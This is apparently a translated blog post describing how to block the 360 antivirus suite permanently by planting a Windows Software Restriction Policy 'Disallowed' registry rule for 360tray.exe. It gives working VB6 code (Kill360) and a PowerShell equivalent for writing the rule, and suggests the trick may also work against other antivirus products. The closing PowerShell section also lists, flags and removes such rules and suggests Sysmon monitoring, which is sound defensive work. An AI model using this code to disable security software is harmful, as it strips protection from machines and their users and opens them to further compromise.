Today I stumbled on a hole that makes it easy to take 360 out: use Windows' own process-launch mechanism to stop 360 from running at all. Windows has a feature called Software Restriction Policies (SRP) that restricts which applications may run. It is a lot like IFEO, except that IFEO is old news and 360 already blocks it completely, while 360 has paid no attention to Windows' own launch-restriction mechanism. So: write a rule that forbids 360 from launching straight into the registry, and 360 can never start again. Not so tough now, 360, haha! Tested successfully with 360安全卫士 9.1 on Windows XP SP3. The same trick may well work against other antivirus products, but that remains to be tested.

How the rule is stored: SRP keeps its path rules under HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\<level>\Paths\{GUID}, where the level 0 means "Disallowed" (0x40000 is "Unrestricted"). Each rule is one subkey named by a GUID, and its ItemData value holds the path pattern; a bare file name such as 360tray.exe matches that file name in any directory. Because the key lives under HKLM, writing it requires administrator rights.
Option Explicit

' Registry API imports (ANSI variants; VB6 converts its strings to ANSI on the call)
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long

Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const ERROR_SUCCESS = 0

Private Const REG_SZ = 1
Private Const REG_DWORD = 4
Private Const REG_QWORD = 11

' SRP path rules live under CodeIdentifiers\<level>\Paths\{GUID}; level 0 is "Disallowed"
Private Const SAFER_DISALLOWED_PATHS = "SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\"

' Permanently block 360 so it can never start again.
' Writes one "Disallowed" SRP path rule for 360tray.exe; needs administrator rights (HKLM).
Public Function Kill360() As Boolean
    Dim hKey As Long
    Dim lRet As Long
    Dim strFileName As String
    Dim bytData(0 To 7) As Byte     ' LastModified: an 8-byte FILETIME, left at zero
    Dim dwFlags As Long             ' SaferFlags: must be a Long so that 4 bytes really are read

    strFileName = "360tray.exe"     ' 360's file name; a bare name matches it in any directory (path-rule example)
    dwFlags = 0

    ' The GUID is only the rule's name; any unique GUID will do
    lRet = RegCreateKey(HKEY_LOCAL_MACHINE, SAFER_DISALLOWED_PATHS & "{487462c2-2064-4e1f-aeae-20b7095a41bb}", hKey)
    If lRet = ERROR_SUCCESS Then
        ' ERROR_SUCCESS is 0, so OR-ing the return codes leaves lRet non-zero if any write failed
        lRet = lRet Or RegSetValueEx(hKey, "Description", 0&, REG_SZ, ByVal "", 1)                             ' empty string plus terminator
        lRet = lRet Or RegSetValueEx(hKey, "ItemData", 0&, REG_SZ, ByVal strFileName, lstrlen(strFileName) + 1)  ' +1 for the terminator
        lRet = lRet Or RegSetValueEx(hKey, "LastModified", 0&, REG_QWORD, bytData(0), 8)
        lRet = lRet Or RegSetValueEx(hKey, "SaferFlags", 0&, REG_DWORD, dwFlags, 4)
        RegCloseKey hKey
        Kill360 = (lRet = ERROR_SUCCESS)
    End If
End Function
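The same rule written from PowerShell, plus the audit and clean-up a defender would run against it. This is an added example and not code from the original post; it assumes only the Safer registry layout shown above. The rule GUID is generated on the fly, and the list of protected process names is an illustrative assumption to extend for your own estate.

```powershell
# Added example, not the post's own code. Writes, lists, flags and removes "Disallowed"
# (level 0) SRP path rules under the Safer key shown in the post.
# Writing under HKLM needs an elevated prompt; reading and auditing do not.

$SaferBase           = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers'
$DisallowedPathRules = Join-Path $SaferBase '0\Paths'      # level 0 = Disallowed

# Assumption: illustrative security-product process names worth alerting on.
$ProtectedProcessNames = @('360tray.exe', 'MsMpEng.exe')

function New-SaferDisallowedPathRule {
    # Equivalent of the post's Kill360(): one subkey per rule, named by a fresh GUID.
    param(
        [Parameter(Mandatory)][string]$ItemData,            # e.g. '360tray.exe' or 'C:\Program Files\360\*'
        [string]$Description = 'SRP path rule'
    )
    $guid = '{' + [guid]::NewGuid().ToString() + '}'
    $key  = Join-Path $DisallowedPathRules $guid
    $null = New-Item -Path $key -Force
    New-ItemProperty -Path $key -Name 'Description'  -PropertyType String -Value $Description | Out-Null
    New-ItemProperty -Path $key -Name 'ItemData'     -PropertyType String -Value $ItemData    | Out-Null
    New-ItemProperty -Path $key -Name 'LastModified' -PropertyType QWord  -Value ([DateTime]::UtcNow.ToFileTimeUtc()) | Out-Null
    New-ItemProperty -Path $key -Name 'SaferFlags'   -PropertyType DWord  -Value 0 | Out-Null
    return $guid
}

function Get-SaferDisallowedPathRule {
    # Lists every Disallowed path rule; returns nothing if SRP was never configured.
    if (-not (Test-Path $DisallowedPathRules)) { return }
    foreach ($sub in Get-ChildItem -Path $DisallowedPathRules) {
        $v  = Get-ItemProperty -Path $sub.PSPath
        $lm = $null
        if ($v.LastModified -is [long] -and $v.LastModified -gt 0) {
            $lm = [DateTime]::FromFileTimeUtc([long]$v.LastModified)   # REG_QWORD FILETIME
        }
        [pscustomobject]@{
            Guid         = $sub.PSChildName
            ItemData     = $v.ItemData
            Description  = $v.Description
            SaferFlags   = $v.SaferFlags
            LastModified = $lm
        }
    }
}

function Test-SuspiciousSaferRule {
    # A Disallowed rule whose pattern ends in a security product's executable is the
    # post's attack; a bare file name with no path matches that name anywhere on disk.
    param($Rule)
    if (-not $Rule.ItemData) { return $false }
    $leaf = Split-Path -Leaf ($Rule.ItemData -replace '[*?]', '')
    return ($ProtectedProcessNames -contains $leaf)
}

function Find-SuspiciousSaferRule {
    Get-SaferDisallowedPathRule | Where-Object { Test-SuspiciousSaferRule $_ }
}

function Remove-SaferDisallowedPathRule {
    param([Parameter(Mandatory)][string]$Guid)
    Remove-Item -Path (Join-Path $DisallowedPathRules $Guid) -Recurse -Force
}

# Attack side (elevated):  New-SaferDisallowedPathRule -ItemData '360tray.exe'
# Defender side:           Find-SuspiciousSaferRule | ForEach-Object { Remove-SaferDisallowedPathRule -Guid $_.Guid }
```

Two practical points follow from how SRP works. The rule is evaluated when a new process is created, so an instance of 360tray.exe that is already running is not terminated; it is only prevented from starting again, which is why the effect shows up after a reboot or after 360 exits. And because the key is plain registry data, the cheap detection is to watch for writes under Safer\CodeIdentifiers (for example Sysmon Event ID 13, registry value set) and to review any rule whose ItemData names a security product; on a domain-joined machine where SRP is delivered by Group Policy, the next policy refresh may also overwrite a locally planted rule.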